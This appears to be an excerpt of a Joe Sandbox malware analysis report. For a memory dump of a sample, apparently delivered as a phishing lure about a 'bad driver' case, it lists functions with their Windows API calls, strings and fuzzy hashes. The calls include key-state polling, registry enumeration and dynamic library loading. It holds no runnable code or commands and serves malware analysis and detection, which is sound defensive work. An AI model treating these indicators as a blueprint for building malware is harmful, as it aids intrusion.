SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C366EC
DestroyWindow.USER32(?), ref: 00C366F4

Strings

SysAnimate32, xrefs: 00C366AB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 7d2ff84fd24ed46a8ebe196be96b0193b1661a51147677cc8be7c1e20074fb62
Instruction ID: d35064517c3d7d3922d5549940b4de4917b602e95014149b9c741aec84a024bf
Opcode Fuzzy Hash: 7d2ff84fd24ed46a8ebe196be96b0193b1661a51147677cc8be7c1e20074fb62
Instruction Fuzzy Hash: D021CF71220205BBEF104F64EC82FBB37BDFB1A3A8F508629F960961A0C7B1CC519760

Uniqueness

Uniqueness Score: -1.00%

Function 00C1703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00C1705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C17091
GetStdHandle.KERNEL32(0000000C), ref: 00C170A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C170DD

Strings

nul, xrefs: 00C170D8

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: e7c45dbcfb809f8e1c4530efaac4e3134e072000cca01e3fae6a7af5520365d7
Instruction ID: ca038414518cea0e63a6961562fc95b6ca17c57de01c1dae6a9d2d6e43fb6726
Opcode Fuzzy Hash: e7c45dbcfb809f8e1c4530efaac4e3134e072000cca01e3fae6a7af5520365d7
Instruction Fuzzy Hash: FF214F74504309ABDB209F69DC05BDE7BB8AF4A720F204B19F8B1D72D0D7719991AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C1710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C1712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C1715D
GetStdHandle.KERNEL32(000000F6), ref: 00C1716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C171A8

Strings

nul, xrefs: 00C171A3

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: bfdb4500dff495cebf6c27ec97ca438fb161f7da8c4f1fe4be2bc7976f3b3b33
Instruction ID: 58ffd7c406a128669e712fa6ade3cb96071468b19b8492e1b487c37122ccc314
Opcode Fuzzy Hash: bfdb4500dff495cebf6c27ec97ca438fb161f7da8c4f1fe4be2bc7976f3b3b33
Instruction Fuzzy Hash: BB21A175904205ABDB209F699C04BEEB7B8AF56730F304B19FCB5D32D0D7709982AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C1AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C1AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C1AF13
__swprintf.LIBCMT ref: 00C1AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00C3F910), ref: 00C1AF6A

Strings

%lu, xrefs: 00C1AF26

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 56ba8af40ec7d0dc2150597d172752f8873727544999f867576804cea8581d2b
Instruction ID: c3b42c26fa78ccfe079e009f583d4bf363d9225ef88acdae7846d715e3900106
Opcode Fuzzy Hash: 56ba8af40ec7d0dc2150597d172752f8873727544999f867576804cea8581d2b
Instruction Fuzzy Hash: 8F214431A00209AFCB10EF65D985EEE77F8EF49704B1044A9F909EB251DB71EA42DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C0A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

Part of subcall function 00C0A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C0A399
Part of subcall function 00C0A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C0A3AC
Part of subcall function 00C0A37C: GetCurrentThreadId.KERNEL32 ref: 00C0A3B3
Part of subcall function 00C0A37C: AttachThreadInput.USER32(00000000), ref: 00C0A3BA

GetFocus.USER32 ref: 00C0A554

Part of subcall function 00C0A3C5: GetParent.USER32(?), ref: 00C0A3D3

GetClassNameW.USER32(?,?,00000100), ref: 00C0A59D
EnumChildWindows.USER32(?,00C0A615), ref: 00C0A5C5
__swprintf.LIBCMT ref: 00C0A5DF

Strings

%s%d, xrefs: 00C0A5D9

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 9cee53a18262dc4153eb7e1b402c179be9d1151012ac8860076264cc6af9b4e7
Instruction ID: 2d847465443435d1461b4900a3570a3adb141f3b71bca53749dfaeb416ff39f7
Opcode Fuzzy Hash: 9cee53a18262dc4153eb7e1b402c179be9d1151012ac8860076264cc6af9b4e7
Instruction Fuzzy Hash: 6811A2B1640308BBDF10BF61DC86FEE37B89F48700F0440B9B908AA192CA719A46DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00C12017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C12048

Strings

EXISTS, xrefs: 00C12070
KEYS, xrefs: 00C1205F
REMOVE, xrefs: 00C1204E
APPEND, xrefs: 00C12081

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 404604c8e9cee6547b190cff3a4acf31d43da55f45e0450eca9b8cc18b3acc4d
Instruction ID: 5192ede5af9a5faac0e30573a4e88b195123bfb5cf4ba74fe27f08c8adab5c15
Opcode Fuzzy Hash: 404604c8e9cee6547b190cff3a4acf31d43da55f45e0450eca9b8cc18b3acc4d
Instruction Fuzzy Hash: 48117C74910109DFCF10EFA4C8815FEB3F4BF1A300F1085AAD85567351EB326A16EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C2EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C2EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C2EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C2F07E
CloseHandle.KERNEL32(?), ref: 00C2F0FF

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 78f155245bdb550357c1234e1a443984a1fe3d261b3618486a87bd485e1c6788
Instruction ID: a26a2e7fbd0b31adc1169d125d673d9cbb90dc5ac82bcdf93c6eee2bffb5aa57
Opcode Fuzzy Hash: 78f155245bdb550357c1234e1a443984a1fe3d261b3618486a87bd485e1c6788
Instruction Fuzzy Hash: 788171716007109FD720EF28D846F6EB7E5AF48710F04886DF999DB292DBB0AD41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C302C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00C310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C30038,?,?), ref: 00C310BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C30388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C303C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C3040E
RegCloseKey.ADVAPI32(?,?), ref: 00C3043A
RegCloseKey.ADVAPI32(00000000), ref: 00C30447

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 76a5b9562464a20a878cf8810b1d5947676a251c2932a1729c43c82be0b75380
Instruction ID: 5303071eebf392d9a669e4bcf735b94d53bd4334e3f797a31ec417db85a703bb
Opcode Fuzzy Hash: 76a5b9562464a20a878cf8810b1d5947676a251c2932a1729c43c82be0b75380
Instruction Fuzzy Hash: 51516B32218204AFD704EF65C891FAEB7E8FF84304F14896DB596972A1DB70EA05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C2DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C2DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 00C2DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 00C2DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 00C2DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C2DD35

Part of subcall function 00BB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C17B20,?,?,00000000), ref: 00BB5B8C
Part of subcall function 00BB5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C17B20,?,?,00000000,?,?), ref: 00BB5BB0

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: f6bde1b2d2549a74fdcb43020f62b4cbbcebe6e1efbafd27503bf102871a8ea4
Instruction ID: 414c4792cd6a4e9d988b9ca9620ea4db429fa2979221ace4779d464abf50cdce
Opcode Fuzzy Hash: f6bde1b2d2549a74fdcb43020f62b4cbbcebe6e1efbafd27503bf102871a8ea4
Instruction Fuzzy Hash: 48512735A00615DFCB11EF68D484AADB7F4FF58310B1480A9E916AB362DB70EE45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C1E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C1E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C1E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C1E8F2

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C1E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C1E91F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 872a4d5676c969a4c5d2736e373404d66c5dad1dadf890d05788ef117cca5a34
Instruction ID: 328b714ebe45fe44ab8898280ad84c3f2930f682039471310682080250870ed1
Opcode Fuzzy Hash: 872a4d5676c969a4c5d2736e373404d66c5dad1dadf890d05788ef117cca5a34
Instruction Fuzzy Hash: DF511735A00205EFCF01EF64C981AAEBBF5FF09310B1484A9E949AB362DB71ED51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C3A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e868324c241e44573e6d84b79a390ecc8f57bdad597be3b39c07abc459e610c9
Instruction ID: 0d25aa80c804031328450de0d07722542fa86ebdf2a135c9520fa6d099c08bcc
Opcode Fuzzy Hash: e868324c241e44573e6d84b79a390ecc8f57bdad597be3b39c07abc459e610c9
Instruction Fuzzy Hash: E041D535D10204AFD754DF28CC48FA9BBA4EB09310F144165F9A5A72F1D770EE61DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BB2357
ScreenToClient.USER32(00C767B0,?), ref: 00BB2374
GetAsyncKeyState.USER32(00000001), ref: 00BB2399
GetAsyncKeyState.USER32(00000002), ref: 00BB23A7

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8be5ec937405b58272476f6fc892a032f00e3f791142cdc5e3aae5d86c2f7e79
Instruction ID: 86e3a26158c03ebc043e8d1fa31eeb7db9971e500efa5cd011636a54e98ed195
Opcode Fuzzy Hash: 8be5ec937405b58272476f6fc892a032f00e3f791142cdc5e3aae5d86c2f7e79
Instruction Fuzzy Hash: 6141AF35904159FFDF159F69C844AEDBBF4FB05320F20439AF828922A0C7749D91DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C06920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C0695D
TranslateAcceleratorW.USER32(?,?,?), ref: 00C069A9
TranslateMessage.USER32(?), ref: 00C069D2
DispatchMessageW.USER32(?), ref: 00C069DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C069EB

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 4b231f9b990273779fac7e6896684d2a2cc2de6257426ce8ef2cfb285008c88e
Instruction ID: 54c0883fed88d5d21d57e535fd7d9816a3436346884a9a77ec994cbd0f87bdee
Opcode Fuzzy Hash: 4b231f9b990273779fac7e6896684d2a2cc2de6257426ce8ef2cfb285008c88e
Instruction Fuzzy Hash: 77310131A10602AADB20DF75CC44FBA7BACAB01300F144169E035C35E1E7309AA6DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C08F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C08F12
PostMessageW.USER32(?,00000201,00000001), ref: 00C08FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C08FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00C08FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C08FDA

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 33f977403ba76571e59e23da3fc12150d63631034096d0e44f0d1b63e423f10d
Instruction ID: 954b8c974d3d300f9eb44fe2c0d3059f095fbf6a1abdeebf41180b2110eb4f2c
Opcode Fuzzy Hash: 33f977403ba76571e59e23da3fc12150d63631034096d0e44f0d1b63e423f10d
Instruction Fuzzy Hash: 8831C07190021AEFDF14CFB8D94DB9E7BB6EB44315F108229F965E61D0C7B09A18DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C0B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C0B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C0B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C0B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C0B742
_wcsstr.LIBCMT ref: 00C0B74C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: b2099b89199d78d3582fdfa384e38962e99874d8f83a0e2b0d7efd772a7f92fe
Instruction ID: 0cca0bf83a7af2327e38625dd3a7d4e0cf55292cfc98446516f981385f1ea21a
Opcode Fuzzy Hash: b2099b89199d78d3582fdfa384e38962e99874d8f83a0e2b0d7efd772a7f92fe
Instruction Fuzzy Hash: F721D731604244BBEB259B399D4AF7FBBACDF45710F10406EF805CA2A1EB61DD41D660

Uniqueness

Uniqueness Score: -1.00%

Function 00C3B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00BB2612: GetWindowLongW.USER32(?,000000EB), ref: 00BB2623

GetWindowLongW.USER32(?,000000F0), ref: 00C3B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C3B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C3B489
GetSystemMetrics.USER32(00000004), ref: 00C3B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C21184,00000000), ref: 00C3B4D0

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 090241b13efe800e5b9a96a8538b86ca1d75aa0cb090fca5ee2be220a8745d41
Instruction ID: 7a849892816f64b06fa4af8ba175cc2179fa3447a32d8ad1415cda5eb6bd4d4d
Opcode Fuzzy Hash: 090241b13efe800e5b9a96a8538b86ca1d75aa0cb090fca5ee2be220a8745d41
Instruction Fuzzy Hash: FA219F71A20615AFCB149F39DC04B6A3BA4EB05721F104B38FA3AC61E2E7309D51DB94

Uniqueness

Uniqueness Score: -1.00%

